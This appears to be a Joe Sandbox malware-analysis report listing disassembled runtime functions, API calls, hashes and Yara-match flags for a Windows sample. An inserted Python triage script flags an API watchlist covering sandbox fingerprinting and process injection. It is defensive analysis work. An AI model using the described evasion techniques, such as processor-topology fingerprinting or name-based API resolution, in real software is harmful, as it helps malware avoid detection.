                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF9A18
                                                                        • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                        • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                        • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_malloc
                                                                      • String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BE4000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BE4000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_be4000_windows10.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000001012000.00000020.00000001.01000000.00000007.sdmp, Offset: 01012000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1012000_windows10.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000000CFC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CFC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_cfc000_windows10.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.00000000010B5000.00000020.00000001.01000000.00000007.sdmp, Offset: 010B5000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_10b5000_windows10.jbxd
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00BFF25A
                                                                      • _malloc.LIBCMT ref: 00BFF293
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2C6
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2E2
                                                                      • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00BFF31C
                                                                      • _malloc.LIBCMT ref: 00BFF355
                                                                      • __freea.LIBCMT ref: 00BFF3AD
                                                                      • __freea.LIBCMT ref: 00BFF3B6
                                                                      • _malloc.LIBCMT ref: 00BFF46B
                                                                      • _memset.LIBCMT ref: 00BFF48D
                                                                      • __freea.LIBCMT ref: 00BFF4D8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                      • String ID:
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00BFA861), ref: 00BFBA60
                                                                      • __init_pointers.LIBCMT ref: 00BFBA6A
                                                                      • __mtterm.LIBCMT ref: 00BFBB20
                                                                        • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FreeValue__init_pointers__mtterm
                                                                      • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 00C02355
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00BFF75E), ref: 00C02395
                                                                      • _malloc.LIBCMT ref: 00C023A5
                                                                      • _memset.LIBCMT ref: 00C023CD
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                      • __freea.LIBCMT ref: 00C0246C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                      • String ID:
                                                                      • API String ID: 3923921168-0
                                                                      • Opcode ID: 5246eab9c9fa1015b25e515cb4412a11950c32429cbf18be7efd486d4165c879
                                                                      • Instruction ID: d6b0e3d2d00466eb7617ae1f929b46ef523074fe0b2646702770a7f4aa94606b
                                                                      • Opcode Fuzzy Hash: 5246eab9c9fa1015b25e515cb4412a11950c32429cbf18be7efd486d4165c879
                                                                      • Instruction Fuzzy Hash: F5516E31900219AECF219FA5DC48DEFBBB9EF89760F244129F524A61A0D7359A41DB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: String___crt$Type_memset
                                                                      • String ID:
                                                                      • API String ID: 1957702402-3916222277
                                                                      • Opcode ID: 67e2e56ed8c42aa71e6e6c91f7cfbf5a6962c2b39f5dcae22c63be6ab552a497
                                                                      • Instruction ID: 5bccd9bc28cd468fc5f11718d41f778cca8648cf747818d4eed948670d91199b
                                                                      • Opcode Fuzzy Hash: 67e2e56ed8c42aa71e6e6c91f7cfbf5a6962c2b39f5dcae22c63be6ab552a497
                                                                      • Instruction Fuzzy Hash: 3D5125B410479C5FDB268B249C95BFB7BE8DF06704F1844E8D6CA87183D2319A4D8F61
                                                                      APIs
                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00C04BC1
                                                                      • __FindPESection.LIBCMT ref: 00C04BDB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                      • String ID:
                                                                      • API String ID: 876702719-0
                                                                      • Opcode ID: 59bca6904b43cb8a0da12073ac6844af6c5823a4cc2d18639c913939bb52249c
                                                                      • Instruction ID: c457ce0c22936e8e388b1f5d8bf7b4737a529d1c0819c1b1b945d5256e77c8c0
                                                                      • Opcode Fuzzy Hash: 59bca6904b43cb8a0da12073ac6844af6c5823a4cc2d18639c913939bb52249c
                                                                      • Instruction Fuzzy Hash: BE91C3B2A006188BDB28CF59D88076FB7B9FB84351F16412DDA25977E1E731ED42CB90
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                      • _malloc.LIBCMT ref: 00BFF64F
                                                                        • Part of subcall function 00C022D3: _strlen.LIBCMT ref: 00C02355
                                                                        • Part of subcall function 00C022D3: _memset.LIBCMT ref: 00C023CD
                                                                        • Part of subcall function 00C022D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                      • _memset.LIBCMT ref: 00BFF66F
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                      • __freea.LIBCMT ref: 00BFF69C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                      • String ID:
                                                                      • API String ID: 574822426-0
                                                                      • Opcode ID: c568740b1fbec095d8d7e3e4032d858e710da62e1f5ad2d43351d8b6eeb3139b
                                                                      • Instruction ID: ee542d89585ce4a2c1e47f1bd733bea0b82deeaf2a8cdd7a14591905a3b578e5
                                                                      • Opcode Fuzzy Hash: c568740b1fbec095d8d7e3e4032d858e710da62e1f5ad2d43351d8b6eeb3139b
                                                                      • Instruction Fuzzy Hash: C751377250010FAFDB209FA4DC81ABE7BE9EF14354B1045BAFA04D7160DA71DD68DBA0
                                                                      APIs
                                                                      • __CreateFrameInfo.LIBCMT ref: 00C04031
                                                                        • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0392F
                                                                        • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0393D
                                                                      • __getptd.LIBCMT ref: 00C0403B
                                                                        • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                      • __getptd.LIBCMT ref: 00C04049
                                                                      • __getptd.LIBCMT ref: 00C04057
                                                                      • __getptd.LIBCMT ref: 00C04062
                                                                        • Part of subcall function 00C039C6: __CallSettingFrame@12.LIBCMT ref: 00C03A12
                                                                        • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0413E
                                                                        • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0414C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 3174811152-0
                                                                      • Opcode ID: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                      • Instruction ID: c825005b41c106604121e7cee1b8e5517399703964e7ade00920bd4aa3271c68
                                                                      • Opcode Fuzzy Hash: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                      • Instruction Fuzzy Hash: 181107B5C04209DFDB00EFA4C985AAE7BF0FF04310F1080A9F914A7291DB789A55DF51
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                      • Instruction ID: facfc26de495bd95f743f6b9e6ff843d37e0a52cc7384122512081d852e66927
                                                                      • Opcode Fuzzy Hash: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                      • Instruction Fuzzy Hash: E011907190420CEFEB10EBB8DC52B7EB7E8FB48314F254066E714D6181EE359A948626
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                      • Instruction ID: 87294933dab529522d583cb354c25481a4c3e069fd1f8a97d09fff900418ef72
                                                                      • Opcode Fuzzy Hash: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                      • Instruction Fuzzy Hash: C1018070D0460CEFEB10EBB89C42A7EB7E8FB08314F114166F714D6181EE75DA948626
                                                                      APIs
                                                                      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 008FC871
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 008FC8CF
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 008FC92C
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 008FC95F
                                                                        • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,008FC8DD), ref: 008FC833
                                                                        • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,008FC8DD), ref: 008FC850
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$LanguagesPreferred$Language
                                                                      • String ID:
                                                                      • API String ID: 2255706666-0
                                                                      • Opcode ID: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                      • Instruction ID: d0f52351635fb46696d556c3066608cab0e73296f065fedb270bd0911e359935
                                                                      • Opcode Fuzzy Hash: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                      • Instruction Fuzzy Hash: 0D314B70E1021E9BDB10EFF8C995ABEB7B4FF08310F104166E665E7291EB749A04CB91
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00BFB635), ref: 00BFB5AC
                                                                      • TlsGetValue.KERNEL32(00C0C658,?,00BFB635), ref: 00BFB5C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: DecodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-629428536
                                                                      • Opcode ID: e7a94842c9d7c5528deac2b675e3a7968b0b083352d3a6e1defb8d49faad4443
                                                                      • Instruction ID: 5ccb32baef7e9fe3b972cbce610e9f4e842f1bd6de297c805d0ab269bd537e39
                                                                      • Opcode Fuzzy Hash: e7a94842c9d7c5528deac2b675e3a7968b0b083352d3a6e1defb8d49faad4443
                                                                      • Instruction Fuzzy Hash: B501F730644259ABCF21AB79DC55FAB7FD88F113A471802A4FD08C7191DB66CD05C6D0
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB531
                                                                      • TlsGetValue.KERNEL32(00C0C658,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB548
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: EncodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-3682587211
                                                                      • Opcode ID: a810c4792753c6deb14df5e4edf6a4459354d74125e330e8eef1a00f6d24c509
                                                                      • Instruction ID: 65a6916c5b4b2104592b281e787dc2c873c205c377566377263481758560e61d
                                                                      • Opcode Fuzzy Hash: a810c4792753c6deb14df5e4edf6a4459354d74125e330e8eef1a00f6d24c509
                                                                      • Instruction Fuzzy Hash: D2F04F7010021EAACB11AF39DC50EBE3BE9DB153A47150271FE18D75A1DB26DE55C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallFrame@12Setting__getptd
                                                                      • String ID: j
                                                                      • API String ID: 3454690891-2137352139
                                                                      • Opcode ID: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                      • Instruction ID: 7037b4632913d1c1e2a39489908174ac7c13724f396e2b50b2188d1f8de34ec3
                                                                      • Opcode Fuzzy Hash: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                      • Instruction Fuzzy Hash: 6B118B71915295EFCB12DF69C8443ACBFB4BF05718F28868AD4A46F1C3C371AA51DB81
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBCMT ref: 00C043C9
                                                                        • Part of subcall function 00C04324: ___BuildCatchObjectHelper.LIBCMT ref: 00C0435A
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00C043E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                      • String ID: csm
                                                                      • API String ID: 3487967840-1018135373
                                                                      • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction ID: 329674052ad0318cca3962b8e062ed892b52cef03767d5e60c89718dd9c29754
                                                                      • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction Fuzzy Hash: 26012FB5000109BBCF16AF51DC46EAB3EAAFF08341F008010BE18241A1D772AAB1EBA0
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00C0413E
                                                                        • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                      • __getptd.LIBCMT ref: 00C0414C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$__amsg_exit
                                                                      • String ID: csm
                                                                      • API String ID: 1969926928-1018135373
                                                                      • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction ID: 2b77350bb6112a19d2276a34448421d23509cc5e303c171c1bf95f4dde67a6cc
                                                                      • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction Fuzzy Hash: 73016DB68002049FDF389F64D444AAEB7B9AF24311F14446DE160562D2CB70DFE4DF41
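Most of the records above are MSVC CRT internals (names such as __getptd, __amsg_exit, _ValidateScopeTableHandlers, __CreateFrameInfo and ___BuildCatchObject, all tagged LIBCMT); the records worth a triager's time are the few with Win32 calls, and the two GetLogicalProcessorInformation records list the same function (refs 008F84C3 and 008F84F7) under different Opcode IDs, with the strings kernel32.dll and GetLogicalProcessorInformation alongside, which reads as a run-time lookup by name. The following script is an added example, not Joe Sandbox output and not code from the sample: it parses the record layout shown on this page, separates LIBCMT calls from Win32 calls, and merges records that belong to the same function before matching them against a small watchlist. The watchlist and its rationale strings are the example's own, chosen to mirror the report's signature names; the sample input is constructed from the records printed above.

```python
"""Triage helper for the function records above.  Added example: not Joe Sandbox output
and not code from the sample.  It parses the record layout shown on this page, splits
MSVC CRT internals (module LIBCMT) from Win32 calls, and groups watchlisted Win32
calls by the function they belong to (the "ref:" addresses)."""
import re
from dataclasses import dataclass, field

# Constructed sample in the page's own layout (bullets as extracted; header lines the
# parser ignores are left out).  Addresses and IDs are the ones printed above.
SAMPLE = """\
APIs
• _strlen.LIBCMT ref: 00C02355
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00BFF75E), ref: 00C02395
• __freea.LIBCMT ref: 00C0246C
• Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
• Opcode ID: 5246eab9c9fa1015b25e515cb4412a11950c32429cbf18be7efd486d4165c879
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
• GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
• Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
Yara matches
• String ID: GetLogicalProcessorInformation$kernel32.dll
• Opcode ID: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
• GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
• Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
Yara matches
• String ID: GetLogicalProcessorInformation$kernel32.dll
• Opcode ID: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
APIs
• __getptd.LIBCMT ref: 00C0413E
  • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
• __getptd.LIBCMT ref: 00C0414C
• Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
• String ID: csm
"""

# A call line: optional "Part of subcall function X:" prefix, Name.MODULE, optional
# argument list, then "ref: ADDR".  LIBCMT lines have no parentheses and no comma.
CALL_RE = re.compile(r"^\s*•\s+(?P<sub>Part of subcall function [0-9A-F]+:\s+)?"
                     r"(?P<name>[\w@$]+)\.(?P<module>\w+)(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class Record:
    calls: list = field(default_factory=list)   # (name, module, ref, from_subcall)
    fields: dict = field(default_factory=dict)  # "Source File", "String ID", "Opcode ID", ...
    yara: bool = False

    @property
    def win32(self):  # direct non-CRT calls; subcall lines belong to other functions
        return sorted({n for n, m, _, sub in self.calls if m != "LIBCMT" and not sub})

    @property
    def crt_only(self):
        return bool(self.calls) and all(m == "LIBCMT" for _, m, _, _ in self.calls)

    @property
    def offset(self):  # module base the memory dump was taken from
        m = re.search(r"Offset:\s*([0-9A-F]+)", self.fields.get("Source File", ""))
        return m.group(1) if m else None

def parse_records(text):
    """Split the report text into Record objects, one per 'APIs' block."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record(); records.append(cur); continue
        if cur is None:
            continue
        if s == "Yara matches":
            cur.yara = True; continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m["name"], m["module"], m["ref"], m["sub"] is not None)); continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
    return records

WATCHLIST = {  # this example's own list; rationale mirrors the report's signature names
    "GetLogicalProcessorInformation": "CPU topology query (VM/sandbox fingerprinting)",
    "GetNativeSystemInfo": "host architecture fingerprint",
    "GetThreadUILanguage": "locale query", "SetThreadPreferredUILanguages": "locale manipulation",
    "WriteProcessMemory": "write into another process (injection)",
}

def triage(records):
    """One hit per function: records whose watchlisted 'ref:' addresses match are merged."""
    hits = {}
    for r in records:
        apis = [a for a in r.win32 if a in WATCHLIST]
        if not apis:
            continue
        key = tuple(sorted(ref for n, _, ref, sub in r.calls if not sub and n in WATCHLIST))
        h = hits.setdefault(key, {
            "offset": r.offset, "refs": key, "apis": apis, "why": [WATCHLIST[a] for a in apis],
            # the DLL name next to the API name in the strings is the usual GetProcAddress pattern
            "resolved_by_name": "kernel32.dll" in r.fields.get("String ID", ""),
            "yara": r.yara, "opcode_ids": []})
        h["opcode_ids"].append(r.fields.get("Opcode ID"))
    return list(hits.values())
```

Run against the full report text the same way: `triage(parse_records(open("report.txt").read()))` gives one entry per watchlisted function with its module offset, the Opcode IDs under which it was listed, and whether the dump region also matched a Yara rule, which is the set a triager would open in the disassembler first.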

                                                                      Execution Graph

                                                                      Execution Coverage:1.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:255
                                                                      Total number of Limit Nodes:28
                                                                      execution_graph 77747 da0c48 77750 da0c50 77747->77750 77748 da0cdb 77751 da0d25 77748->77751 77760 da0e9b 77748->77760 77761 d90354 77748->77761 77750->77748 77752 d90354 2 API calls 77750->77752 77753 d90354 2 API calls 77751->77753 77754 da0d6f 77751->77754 77752->77748 77753->77754 77755 d90354 2 API calls 77754->77755 77758 da0db9 77754->77758 77755->77758 77756 da0e45 77757 d90354 2 API calls 77756->77757 77756->77760 77757->77760 77758->77756 77759 d90354 2 API calls 77758->77759 77759->77756 77762 d9036e 77761->77762 77765 d8544c 77762->77765 77763 d903cd 77763->77751 77766 d85460 77765->77766 77772 d84a24 77766->77772 77768 d85486 77769 d8558f 77768->77769 77776 b7e834 77768->77776 77769->77763 77770 d85517 77770->77763 77773 d84a2d 77772->77773 77780 cecae4 77773->77780 77775 d84a43 77775->77768 77777 b7e84a 77776->77777 77792 b7e7a8 77777->77792 77779 b7e89a 77779->77770 77781 cecaf5 77780->77781 77783 cecb79 77781->77783 77784 d8d3ec 77781->77784 77783->77775 77787 d8d1a8 77784->77787 77786 d8d3f9 77786->77783 77788 d8d323 77787->77788 77789 d8d1d8 77787->77789 77788->77786 77789->77788 77790 d8d260 RegOpenKeyExW 77789->77790 77790->77789 77791 d8d273 77790->77791 77791->77786 77793 b7e7c9 77792->77793 77797 b7e80c 77792->77797 77794 b7e7a8 KiUserCallbackDispatcher 77793->77794 77793->77797 77795 b7e7e1 77794->77795 77798 b7d0a0 77795->77798 77797->77779 77799 b7d0b1 77798->77799 77800 b7d11d 77799->77800 77803 b854a4 77799->77803 77800->77797 77804 b854c0 77803->77804 77807 b8ad64 77804->77807 77806 b7d0fc 77806->77797 77808 b8ad9d 77807->77808 77811 ce94b0 77808->77811 77809 b8af5c 77809->77806 77812 ce94ca KiUserCallbackDispatcher 77811->77812 77812->77809 77813 d3cee0 77814 d3cef5 77813->77814 77815 d3cee9 77813->77815 77817 d38164 77815->77817 77818 d3816e 77817->77818 77819 d381e4 77818->77819 77821 afaf3c 77818->77821 77819->77814 77822 afaf69 GetFileVersionInfoSizeW 
Execution graph (drawn as a figure in the original report; the node-number edge list is summarised here by entry point and the API or CRT routine each path reaches):
• afaf89/afafbc (tail of the afaf3c routine): GetFileVersionInfoW
• dd9748 -> dd99fe -> dd9a24 (std::bad_alloc::bad_alloc) -> ddc0b6 (_malloc) -> ddc125 RtlAllocateHeap; ddc18f TlsGetValue, TlsGetValue, _doexit; ddc050 __cinit (9 API calls); dd99e1 std::exception::exception (7 API calls); dd9a54 CallUnexpected
